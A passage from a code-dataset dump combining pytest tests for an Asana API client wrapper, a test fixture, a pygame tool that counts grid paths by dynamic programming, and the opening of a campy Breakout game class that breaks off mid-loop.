assert 'Test warning' in caplog.record_tuples[0][2]
def test_asana_error_handler(caplog):
"""
Tests the `@asana_error_handler` decorator.
"""
caplog.set_level(logging.ERROR)
def gen_text(text1, text2, text3):
return f'{text1} | {text2} | {text3}'
dec_gen_text = aclient.asana_error_handler(gen_text)
assert dec_gen_text('one', text3='three', text2='two') \
== 'one | two | three'
assert dec_gen_text._is_wrapped_by_asana_error_handler is True
def raise_error(exception_type):
raise exception_type
dec_raise_error = aclient.asana_error_handler(raise_error)
exception_types = [
asana.error.PremiumOnlyError,
asana.error.RateLimitEnforcedError,
]
for exception_type in exception_types:
subtest_asana_error_handler_func(caplog, exception_type, 0,
dec_raise_error, exception_type)
assert dec_raise_error._is_wrapped_by_asana_error_handler is True
@pytest.mark.parametrize('func_name', [
'_get_me',
'get_workspace_gid_from_name',
'get_project_gid_from_name',
'get_section_gid_from_name',
'get_user_task_list_gid',
'get_section_gids_in_project_or_utl',
'get_tasks',
'move_task_to_section',
])
def test_dec_usage_asana_error_handler(func_name):
"""
Tests that functions that are expected to use the `@asana_error_handler`
decorator do in fact have it.
"""
func = getattr(aclient, func_name)
assert func._is_wrapped_by_asana_error_handler is True
def test__get_client(monkeypatch):
"""
Tests the `_get_client()` method.
This relies on /config/.secrets.conf being setup with a real personal access
token.
"""
client = aclient._get_client()
assert client is not None
def mock_read_conf_file(conf_rel_file, # pylint: disable=unused-argument
conf_base_dir=None): # pylint: disable=unused-argument
"""
Return an empty dict instead of loading from file.
"""
return {}
# read_conf_file() returning bad config allows to confirm client cache works
orig_read_conf_file = config.read_conf_file
monkeypatch.setattr(config, 'read_conf_file', mock_read_conf_file)
client = aclient._get_client()
assert client is not None
monkeypatch.delattr(aclient._get_client, 'client')
with pytest.raises(aclient.ClientCreationError) as ex:
aclient._get_client()
assert "Could not create client - Could not find necessary section/key in" \
+ " .secrets.conf: 'asana'" in str(ex.value)
monkeypatch.setattr(config, 'read_conf_file', orig_read_conf_file)
def mock_client_access_token__missing( # pylint: disable=invalid-name
accessToken): # pylint: disable=unused-argument
"""
Mock the client creation via access token with header keys missing.
"""
return types.SimpleNamespace(headers={})
def mock_client_access_token__empty( # pylint: disable=invalid-name
accessToken): # pylint: disable=unused-argument
"""
Mock the client creation via access token with header keys present, but
empty values.
"""
return types.SimpleNamespace(headers={'asana-enable': ''})
def mock_client_access_token__existing( # pylint: disable=invalid-name
accessToken): # pylint: disable=unused-argument
"""
Mock the client creation via access token with header keys present and
with some existing values.
"""
return types.SimpleNamespace(headers={'asana-enable': 'existing'})
monkeypatch.setattr(asana.Client, 'access_token',
mock_client_access_token__missing)
client = aclient._get_client()
assert client is not None
assert client.headers == {
'asana-enable': 'new_user_task_lists',
}
monkeypatch.delattr(aclient._get_client, 'client')
monkeypatch.setattr(asana.Client, 'access_token',
mock_client_access_token__existing)
client = aclient._get_client()
assert client is not None
assert client.headers == {
'asana-enable': 'existing,new_user_task_lists',
}
monkeypatch.delattr(aclient._get_client, 'client')
monkeypatch.setattr(asana.Client, 'access_token',
mock_client_access_token__empty)
client = aclient._get_client()
assert client is not None
assert client.headers == {
'asana-enable': 'new_user_task_lists',
}
def test__get_me(monkeypatch, caplog):
"""
Tests the `_get_me()` method.
This relies on /config/.secrets.conf being setup with a real personal access
token.
** Consumes 2 API calls. **
"""
caplog.set_level(logging.WARNING)
me_data = aclient._get_me()
assert me_data['gid']
def mock_read_conf_file(conf_rel_file, # pylint: disable=unused-argument
conf_base_dir=None): # pylint: disable=unused-argument
"""
Return a bad personal access token to pass client creation but fail API.
"""
return {
'asana': {
'personal access token': '<PASSWORD>',
},
}
# Function-specific practical test of @asana_error_handler
monkeypatch.delattr(aclient._get_client, 'client')
monkeypatch.setattr(config, 'read_conf_file', mock_read_conf_file)
subtest_asana_error_handler_func(caplog, asana.error.NoAuthorizationError,
0, aclient._get_me)
def test__find_gid_from_name(caplog):
"""
Tests the `_find_gid_from_name()` method.
No API calls. Methods that use this `_find_gid_from_name()` method will
verify API compatibility then. This stays focused on testing logic.
"""
caplog.set_level(logging.INFO)
data = [
{
'gid': 1,
'name': 'one and only',
'resource_type': 'workspace',
},
{
'gid': 2,
'name': 'two with dupe',
'resource_type': 'workspace',
},
{
'gid': 3,
'name': 'two with dupe',
'resource_type': 'workspace',
},
{
'gid': 4,
'name': 'not workspace',
'resource_type': 'organization',
},
]
resource_type = 'workspace'
gid = aclient._find_gid_from_name(data, resource_type, 'one and only', 1)
assert gid == 1
caplog.clear()
gid = aclient._find_gid_from_name(data, resource_type, 'one and only')
assert gid == 1
assert caplog.record_tuples == [
('asana_extensions.asana.client', logging.INFO,
'GID of workspace "one and only" is 1'),
]
with pytest.raises(aclient.MismatchedDataError):
aclient._find_gid_from_name(data, resource_type, 'one and only', -1)
with pytest.raises(aclient.DuplicateNameError):
aclient._find_gid_from_name(data, resource_type, 'two with dupe')
with pytest.raises(aclient.DataNotFoundError):
aclient._find_gid_from_name(data, resource_type, 'invalid name')
@pytest.mark.asana_error_data.with_args(asana.error.ForbiddenError)
def test_get_workspace_gid_from_name(monkeypatch, caplog, raise_asana_error):
"""
Tests the `get_workspace_gid_from_name()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 2 API calls. **
(varies depending on data size, but only 2 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
# To ensure compatible with _find_gid_from_name(), validate data format
client = aclient._get_client()
workspaces = client.workspaces.get_workspaces()
workspace = next(workspaces)
assert 'gid' in workspace
assert 'name' in workspace
assert 'resource_type' in workspace
# Function-specific practical test of @asana_error_handler
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.workspaces, 'get_workspaces', raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.ForbiddenError, 0,
aclient.get_workspace_gid_from_name, 'one and only')
@pytest.mark.asana_error_data.with_args(asana.error.NotFoundError)
def test_get_project_gid_from_name(monkeypatch, caplog, project_test,
raise_asana_error):
"""
Tests the `get_project_gid_from_name()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 3 API calls. **
(varies depending on data size, but only 3 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
# Sanity check that this works with an actual project
proj_gid = aclient.get_project_gid_from_name(ws_gid, project_test['name'],
int(project_test['gid']))
assert proj_gid == int(project_test['gid'])
# To ensure compatible with _find_gid_from_name(), validate data format
client = aclient._get_client()
projects = client.projects.get_projects({'workspace': str(ws_gid)})
project = next(projects)
assert 'gid' in project
assert 'name' in project
assert 'resource_type' in project
# Function-specific practical test of @asana_error_handler
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.projects, 'get_projects', raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.NotFoundError, 0,
aclient.get_project_gid_from_name, ws_gid, project_test['name'])
@pytest.mark.asana_error_data.with_args(asana.error.InvalidTokenError)
def test_get_section_gid_from_name(monkeypatch, caplog, project_test,
sections_in_project_test, raise_asana_error):
"""
Tests the `get_section_gid_from_name()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 2 API calls. **
(varies depending on data size, but only 2 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
# Only need 1 section
section_in_project_test = sections_in_project_test[0]
# Sanity check that this works with an actual section
try:
sect_gid = aclient.get_section_gid_from_name(project_test['gid'],
section_in_project_test['name'],
int(section_in_project_test['gid']))
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
assert sect_gid == int(section_in_project_test['gid'])
# To ensure compatible with _find_gid_from_name(), validate data format
client = aclient._get_client()
sections = client.sections.get_sections_for_project(project_test['gid'])
section = next(sections)
assert 'gid' in section
assert 'name' in section
assert 'resource_type' in section
# Function-specific practical test of @asana_error_handler
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.sections, 'get_sections_for_project',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.InvalidTokenError, 0,
aclient.get_section_gid_from_name, project_test['gid'],
section_in_project_test['name'])
@pytest.mark.asana_error_data.with_args(asana.error.ServerError)
def test_get_user_task_list_gid(monkeypatch, caplog, raise_asana_error):
"""
Tests the `get_user_task_list_gid()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 4 API calls. **
(varies depending on data size, but only 4 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
me_gid = aclient._get_me()['gid']
me_utl_gid = aclient.get_user_task_list_gid(ws_gid, True)
uid_utl_gid = aclient.get_user_task_list_gid(ws_gid, user_gid=me_gid)
assert me_utl_gid == uid_utl_gid
assert me_utl_gid > 0
with pytest.raises(AssertionError) as ex:
aclient.get_user_task_list_gid(0)
assert 'Must provide `is_me` or `user_gid`, but not both.' in str(ex.value)
with pytest.raises(AssertionError) as ex:
aclient.get_user_task_list_gid(0, True, 0)
assert 'Must provide `is_me` or `user_gid`, but not both.' in str(ex.value)
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.user_task_lists, 'get_user_task_list_for_user',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.ServerError, 0,
aclient.get_user_task_list_gid, 0, True)
@pytest.mark.asana_error_data.with_args(asana.error.InvalidRequestError)
def test_get_section_gids_in_project_or_utl(monkeypatch, caplog, project_test,
sections_in_project_test, raise_asana_error):
"""
Tests the `get_section_gids_in_project_or_utl()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 1 API call. **
(varies depending on data size, but only 1 call intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
# Only need 1 section
section_in_project_test = sections_in_project_test[0]
try:
sect_gids = aclient.get_section_gids_in_project_or_utl(
project_test['gid'])
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
assert int(section_in_project_test['gid']) in sect_gids
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.sections, 'get_sections_for_project',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.InvalidRequestError, 0,
aclient.get_section_gids_in_project_or_utl, project_test['gid'])
@pytest.mark.asana_error_data.with_args(asana.error.NoAuthorizationError)
def test_get_tasks(monkeypatch, caplog, # pylint: disable=too-many-locals
project_test, sections_in_project_test, sections_in_utl_test,
tasks_in_project_and_utl_test, raise_asana_error):
"""
Tests the `get_tasks()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 4 API calls. **
(varies depending on data size, but only 4 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
me_data = aclient._get_me()
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
params = {
'assignee': me_data['gid'],
'workspace': ws_gid,
}
fields = [
'assignee_section',
'due_at',
'name',
'projects',
]
tasks_found = aclient.get_tasks(params, fields)
tasks_to_check = filter_result_for_test(tasks_found,
tasks_in_project_and_utl_test, 'gid', True)
assert len(tasks_to_check) == len(tasks_in_project_and_utl_test)
for i_task_expected, task_found in tasks_to_check.items():
task_expected = tasks_in_project_and_utl_test[i_task_expected]
assert task_found['assignee_section']['gid'] \
== sections_in_utl_test[0]['gid']
assert task_found['due_at'] is None
assert task_found['name'] == task_expected['name']
assert task_found['projects'][0]['gid'] == project_test['gid']
params = {
'project': project_test['gid'],
}
fields = [
'due_on',
'memberships.section',
'name',
'projects',
]
tasks_found = aclient.get_tasks(params, fields)
tasks_to_check = filter_result_for_test(tasks_found,
tasks_in_project_and_utl_test, 'gid', True)
assert len(tasks_to_check) == len(tasks_in_project_and_utl_test)
for i_task_expected, task_found in tasks_to_check.items():
task_expected = tasks_in_project_and_utl_test[i_task_expected]
assert task_found['due_on'] is None
assert task_found['name'] == task_expected['name']
assert task_found['projects'][0]['gid'] == project_test['gid']
assert sections_in_project_test[0]['gid'] in \
[m['section']['gid'] for m in task_found['memberships'] \
if 'section' in m]
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.tasks, 'get_tasks', raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.NoAuthorizationError,
0, aclient.get_tasks, {})
@pytest.mark.asana_error_data.with_args(asana.error.PremiumOnlyError)
def test_move_task_to_section__common(monkeypatch, caplog, raise_asana_error):
"""
Tests common elements for the `move_task_to_section()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 1 API call. **
(varies depending on data size, but only 1 call intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
# Simple test that project is configured, but non-error result not used
aclient._get_me()
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.sections, 'add_task_for_section',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.PremiumOnlyError,
0, aclient.move_task_to_section, -1, -2)
@pytest.mark.parametrize('is_utl_test, i_sect, move_to_bottom', [
# The order is crucial, as each depends on the residual state of the tasks
(False, 1, False),
(False, 0, True),
(True, 1, False),
(True, 0, True),
])
def test_move_task_to_section__parametrized(is_utl_test, i_sect, move_to_bottom,
sections_in_project_test, sections_in_utl_test,
tasks_movable_in_project_and_utl_test):
"""
Tests parametrized paths for the `move_task_to_section()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 14 API calls total. **
(varies depending on data size, but only 4 calls intended)
(API call count is 3 [+1 if not is_utl_test] for each parameter)
( with equal num with and without is_utl_test: 3.5*num_parameters)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
try:
# Simple test that project is configured, but non-error result not used
aclient._get_me()
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
if is_utl_test:
sects = sections_in_utl_test
else:
sects = sections_in_project_test
aclient.move_task_to_section(
tasks_movable_in_project_and_utl_test[0]['gid'],
sects[i_sect]['gid'], move_to_bottom)
params = {
'section': sects[i_sect]['gid'],
}
tasks_found = aclient.get_tasks(params)
tasks_to_check = filter_result_for_test(tasks_found,
tasks_movable_in_project_and_utl_test, 'gid')
assert len(tasks_to_check) == 2
if move_to_bottom:
assert tasks_to_check[-1]['gid'] \
== tasks_movable_in_project_and_utl_test[0]['gid']
else:
assert tasks_to_check[0]['gid'] \
== tasks_movable_in_project_and_utl_test[0]['gid']
def test_pagination(project_test, sections_in_project_test):
"""
Tests compatibility with `asana` package to ensure that any pagination is
handled in a way that is compatible with how this project expects it.
** Consumes at least 2 API calls. **
(varies depending on data size, but only 2 calls intended)
"""
client = aclient._get_client()
client.options['page_size'] = 1
sect_gids = aclient.get_section_gids_in_project_or_utl(project_test['gid'])
# Should match exactly, but other tests may have added more sects to server
assert len(sect_gids) >= len(sections_in_project_test)
for sect in sections_in_project_test:
assert int(sect['gid']) in sect_gids
```
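Several tests above pin down the behavior of the `asana_error_handler` decorator: the `_is_wrapped_by_asana_error_handler` marker attribute, the re-raised exception, and the 'API query failed' ERROR log from `asana_extensions.asana.client`. The real decorator is not shown in this excerpt; a hedged sketch consistent with those assertions could look like this:
```python
# Hedged sketch only; the actual implementation in asana_extensions/asana/client.py
# may differ in details.
import functools
import logging

import asana

logger = logging.getLogger(__name__)

def asana_error_handler(func):
    """Log and re-raise any asana API error from the wrapped call."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except asana.error.AsanaError as ex:
            logger.error(f'API query failed in {func.__name__}: {ex}')
            raise
    # Marker attribute that test_dec_usage_asana_error_handler() checks.
    wrapper._is_wrapped_by_asana_error_handler = True
    return wrapper
```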
#### File: unit/rules/conftest.py
```python
import pytest
from asana_extensions.rules import rule_meta
@pytest.fixture(name='blank_rule_cls')
def fixture_blank_rule_cls():
"""
Returns a blank rule with default returns for all abstract methods. This
can be used as is in most cases; in most other cases, this can serve as a
base with tests only needing to override individual methods via monkeypatch.
"""
class BlankRule(rule_meta.Rule):
"""
Simple blank rule to subclass Rule.
"""
@classmethod
def load_specific_from_conf(cls, rules_cp, rule_id, rule_params=None,
**kwargs):
"""
Not needed / will not be used.
"""
return
@classmethod
def get_rule_type_names(cls):
"""
Not needed / will not be used.
"""
return []
def _sync_and_validate_with_api(self):
"""
Not needed / will not be used.
"""
return True
def execute(self, force_test_report_only=False):
"""
Not needed / will not be used.
"""
return True
return BlankRule
``` |
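A test consuming this fixture would typically instantiate the blank rule and exercise the concrete logic inherited from `Rule`, for example (illustrative only):
```python
# Illustrative use of the `blank_rule_cls` fixture in a test module.
def test_is_valid_caches_result(blank_rule_cls):
    rule = blank_rule_cls('test-rule', 'blank rule', test_report_only=False)
    # First call runs the stubbed _sync_and_validate_with_api() and caches True.
    assert rule.is_valid() is True
    # Second call is served from the cached _is_valid value.
    assert rule.is_valid() is True
    assert rule.get_rule_id() == 'test-rule'
```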
{
"source": "Jonathan-Cen/Dynamic-Programming-Count-Paths",
"score": 3
} |
#### File: Jonathan-Cen/Dynamic-Programming-Count-Paths/CountPathsFromBlueToRed.py
```python
import pygame
# Initialize pygame
pygame.init()
'''Define Colors'''
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 255, 0)
LIGHT_GREEN = (0, 150, 0)
RED = (255, 0, 0)
LIGHT_RED = (150, 0, 0)
BLUE = (0,0,255)
LIGHT_BLUE = (0,0,150)
'''Width, height, and Margin of each grid'''
WIDTH = 50
HEIGHT = 50
MARGIN = 8
NUM_OF_GRIDS = 8
GRID_WIDTH = ((MARGIN + WIDTH)*NUM_OF_GRIDS + MARGIN)
# Set the HEIGHT and WIDTH of the screen
WINDOW_WIDTH = int(((WIDTH + MARGIN)*NUM_OF_GRIDS + MARGIN) * 2.5)
WINDOW_HEIGHT = (HEIGHT + MARGIN)*NUM_OF_GRIDS + MARGIN
'''Initialize the fonts for this program'''
generalFont = pygame.font.Font('freesansbold.ttf', WINDOW_WIDTH//30)
buttonFont = pygame.font.Font('freesansbold.ttf', WINDOW_WIDTH//40)
#Text margins
TEXT_MARGIN = 0.05*(WINDOW_WIDTH - GRID_WIDTH)
#Button variables
button_width = WINDOW_WIDTH//6
button_height = WINDOW_WIDTH//40 + 10
button_x_calculate = GRID_WIDTH + WINDOW_WIDTH//20 #GRID_WIDTH + (WINDOW_WIDTH - GRID_WIDTH)//2 - button_width//2
button_x_reset = int(WINDOW_WIDTH * (4/5))
button_y = WINDOW_HEIGHT//2
def createInitializedPathArray(rows, cols, initValue = 0):
new_array = []
for row in range(rows):
new_row = []
for col in range(cols):
new_row.append(initValue)
new_array.append(new_row)
return new_array
#Using Dynamic Programming to find the number of paths
def countingPath(grid, row, col, paths):
if(not validSquare(grid, row, col)):
return 0
if(isAtEnd(grid, row, col)):
return 1
if(paths[row][col] == 0):
paths[row][col] = countingPath(grid, row + 1, col, paths) + countingPath(grid, row, col + 1, paths)
return paths[row][col]
def validSquare(grid, row, col):
try:
return grid[row][col] >= 0
except(IndexError):
return False
def isAtEnd(grid, row, col):
try:
return grid[row][col] == 2
except(IndexError):
return False
def countPath(grid):
start_row = 0
start_col = 0
empty = createInitializedPathArray(NUM_OF_GRIDS, NUM_OF_GRIDS)
return countingPath(grid, start_row, start_col, empty)
def getGrid(NUM_OF_GRIDS):
# Create a 2 dimensional array. A two dimensional
# array is simply a list of lists.
grid = []
for row in range(NUM_OF_GRIDS):
grid.append([])
for column in range(NUM_OF_GRIDS):
grid[row].append(0)
#Set the end position to red
grid[-1][-1] = 2
#Set the start position to blue
grid[0][0] = 1
return grid
def showText(screen, message, x, y):
textSurf = buttonFont.render(message, True, WHITE)
textRect = textSurf.get_rect()
textRect.center = (x, y) ## (distance from left, distance from top)
screen.blit(textSurf, textRect)
def blit_text(screen, message, startPosition):
words = message.split(' ')
space = generalFont.size(' ')[0]
max_width = WINDOW_WIDTH - 30
x,y = startPosition
for word in words:
word_surface = generalFont.render(word, True, WHITE)
word_width, word_height = word_surface.get_size()
if x + word_width >= max_width:
x = startPosition[0]
y += word_height #start a new row
screen.blit(word_surface, (x, y))
x += word_width + space
def displayButton(screen):
#Buttons on Screen
mouse = pygame.mouse.get_pos()
if(mouse[0] >= button_x_calculate and mouse[0] <= button_x_calculate + button_width and mouse[1] >= button_y and mouse[1] <= button_y + button_height):
pygame.draw.rect(screen, GREEN, (button_x_calculate, button_y,button_width,button_height))
else:
pygame.draw.rect(screen, LIGHT_GREEN, (button_x_calculate, button_y,button_width,button_height))
showText(screen, "Calculate", button_x_calculate + button_width/2, button_y + button_height/2 + 2)
if(mouse[0] >= button_x_reset and mouse[0] <= button_x_reset + button_width and mouse[1] >= button_y and mouse[1] <= button_y + button_height):
pygame.draw.rect(screen, RED, (button_x_reset, button_y,button_width,button_height))
else:
pygame.draw.rect(screen, LIGHT_RED, (button_x_reset, button_y,button_width,button_height))
showText(screen, "Reset", button_x_reset + button_width/2, button_y + button_height/2 + 2)
def calculateClicked(pos):
if(pos[0] >= button_x_calculate and pos[0] <= button_x_calculate + button_width and pos[1] >= button_y and pos[1] <= button_y + button_height):
return True
return False
def resetClicked(pos):
if(pos[0] >= button_x_reset and pos[0] <= button_x_reset + button_width and pos[1] >= button_y and pos[1] <= button_y + button_height):
return True
return False
def gameLoop():
grid = getGrid(NUM_OF_GRIDS)
screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
# Set title of screen window
pygame.display.set_caption("Count Paths From Blue to Red")
EXIT = False
paths = None
clock = pygame.time.Clock()
# -------- Main Program Loop -----------
while not EXIT:
screen.fill(BLACK)
intro_message = "Please specify obstacles by clicking on the grid. Obstacles are coloured in green."
blit_text(screen, intro_message, (GRID_WIDTH + TEXT_MARGIN, TEXT_MARGIN))
displayButton(screen)
#screen.blit(text, textRect)
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
EXIT = True # Flag that we are done so we exit this loop
elif event.type == pygame.MOUSEBUTTONDOWN:
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
#Check if the user clicks the Calculate button:
if(calculateClicked(pos)):
paths = countPath(grid)
if(resetClicked(pos)):
grid = getGrid(NUM_OF_GRIDS)
paths = None
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // (WIDTH + MARGIN)
row = pos[1] // (HEIGHT + MARGIN)
try:
if(grid[row][column] == 0):
grid[row][column] = -1
elif(grid[row][column] == -1): #allow the user to unselect an obstacle
grid[row][column] = 0
except(IndexError):
continue
if paths is None:
result_message = "Number of paths from blue to red: "
else:
result_message = "Number of paths from blue to red: " + str(paths)
blit_text(screen, result_message, (GRID_WIDTH + TEXT_MARGIN, WINDOW_HEIGHT*4/5))
# Draw the grid
for row in range(NUM_OF_GRIDS):
for column in range(NUM_OF_GRIDS):
color = WHITE
if grid[row][column] == -1:
color = GREEN
elif grid[row][column] == 2:
color = RED
elif grid[row][column] == 1:
color = BLUE
pygame.draw.rect(screen, color, [(MARGIN + WIDTH) * column + MARGIN,
(MARGIN + HEIGHT) * row + MARGIN,
WIDTH,
HEIGHT])
clock.tick(60)
pygame.display.update()
gameLoop()
pygame.quit()
``` |
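The counting core above is a top-down dynamic programming recurrence: the number of paths out of a cell is the number of paths from the cell below plus the cell to the right, memoised in `paths` so each cell is computed only once. Stripped of the pygame parts, the same idea on a small illustrative grid:
```python
# Self-contained illustration of the recurrence used by countingPath():
# paths(r, c) = paths(r + 1, c) + paths(r, c + 1), with obstacles marked -1
# and the goal cell marked 2.
def count_paths(grid):
    rows, cols = len(grid), len(grid[0])
    memo = {}

    def helper(r, c):
        if r >= rows or c >= cols or grid[r][c] == -1:
            return 0                      # off the board or an obstacle
        if grid[r][c] == 2:
            return 1                      # reached the goal cell
        if (r, c) not in memo:
            memo[(r, c)] = helper(r + 1, c) + helper(r, c + 1)
        return memo[(r, c)]

    return helper(0, 0)

demo = [
    [1,  0,  0],
    [0, -1,  0],
    [0,  0,  2],
]
print(count_paths(demo))  # 2 paths avoid the single obstacle
```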
{
"source": "JonathanCheng0101/SC101-projects",
"score": 3
} |
#### File: SC101-projects/SC101_Assignment2/breakoutgraphics.py
```python
from campy.gui.events.timer import pause
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmousemoved, onmouseclicked
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Width of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
FRAME_RATE = 1000 / 120
lives=3
class BreakoutGraphics:
def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
title='Breakout'):
# Create a graphical window, with some extra space.
window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=window_width, height=window_height, title=title)
self.paddle = GRect(paddle_width,paddle_height) # Create a paddle.
self.paddle.filled = True
self.paddle.fill_color = "black"
self.paddle_height = paddle_height
self.paddle_width = paddle_width
self.window.add(self.paddle,(self.window.width-paddle_width)/2, self.window.height-PADDLE_OFFSET)
self.ball = GOval(ball_radius,ball_radius)
self.ball.filled = True
self.ball.fill_color = "darkred"
self.window.add(self.ball,self.window.width/2, self.window.height-PADDLE_OFFSET-PADDLE_HEIGHT)
self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = random.randint(2,INITIAL_Y_SPEED)
self.paddle_offset = PADDLE_OFFSET
self.live = lives
self.frame_rate = FRAME_RATE
i = 0
j = 0
while i < 11 and j < 10: # this part is for making bricks; through two variables, I simulate the rows and columns of bricks
if i < 10:
brick_i = GRect(brick_width, brick_height)
self.window.add(brick_i, x=0 + i *( brick_width + brick_spacing), y=brick_offset + j* (brick_height + brick_spacing))
if j < 2:
brick_i.filled = True
